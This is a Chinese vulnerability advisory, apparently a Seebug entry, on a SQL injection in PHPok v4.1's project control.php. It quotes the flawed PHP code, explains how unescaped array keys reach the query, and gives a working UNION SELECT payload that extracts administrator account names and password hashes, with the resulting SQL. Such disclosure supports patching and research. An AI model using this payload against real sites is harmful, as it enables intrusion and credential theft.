PHPok v4.1 /framework/www/project/control.php SQL注入漏洞

基本字段

漏洞编号：: SSV-89008

披露/发现时间：: 2014-11-19

提交时间：: 2014-12-30

漏洞等级：

漏洞类别：: SQL 注入

影响组件：: PHPok
(v4.1)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0.4KB

<ul><li>/framework/www/project_control.php</li></ul> ``` $ext = $this->get("ext"); if($ext && is_array($ext)) { $c = ''; foreach($ext AS $key=>$value) { if($key && $value) { $c[] = "ext.".$key." LIKE '%".$value."%'"; $pageurl .= "ext[".$key."]=".rawurlencode($value)."&"; } } if($c) $dt['sqlext'] = implode(" AND ",$c); $this->assign('ext',$ext); } ``` 通过get()方法获得ext，带入SQL语句中，跟进get方法。 <ul><li>/framework/init.php</li></ul> ``` function get($id,$type="safe",$ext="") { $val = isset($_POST[$id]) ? $_POST[$id] : (isset($_GET[$id]) ? $_GET[$id] : ""); if($val == '') return false; //判断内容是否有转义，所有未转义的数据都直接转义 $addslashes = false; if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) $addslashes = true; if(!$addslashes) $val = $this->_addslashes($val); return $this->format($val,$type,$ext); } ``` 获取到用户传入的ext并进入format函数：<pre class=""> function format($msg,$type="safe",$ext="") { if($msg == "") return false; if(is_array($msg)) { foreach($msg AS $key=>$value) { $msg[$key] = $this->format($value,$type,$ext); } return $msg; } …… </pre>当msg为数组时，并未addslashes直接返回，造成key可以插入注入语句造成注入。当用户提交：<pre class="">c=project&id=product&ext[id%3D0%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2Cconcat%28account%2C0x7c%2Cpass%29%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%20from%20qinggan_adm%23]=test</pre>执行的SQL语句为：<pre class="">SELECT l.*,ext.thumb,ext.pictures,ext.spec_single,ext.qingdian,ext.content FROM qinggan_list l JOIN qinggan_list_24 ext ON(l.id=ext.id AND l.site_id=ext.site_id AND l.project_id=ext.project_id) WHERE l.project_id=45 AND l.site_id=1  AND l.hidden=0  AND l.status=1 AND l.parent_id=0 AND l.cate_id IN(70,72,157,158,168,169,170,171,172,173,174,175,176,177,178,179,180,151,167,161,166,163,165,164,160,181,182,183,152,184,185,186,187,188,189,190,191,192,193)  AND ext.id=0 union select 1,2,3,4,5,6,concat(account,0x7c,pass),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from qinggan_adm# LIKE '%test%'ORDER BY l.sort DESC,l.dateline DESC,l.id DESC LIMIT 0,5</pre>页面返回： <img alt="5553D3D8-879F-40E0-A40D-182F64F7B3C3.png" src="https://images.seebug.org/@/uploads/1434683360753-5553D3D8-879F-40E0-A40D-182F64F7B3C3.png" data-image-size="1318,608"> 证明漏洞存在。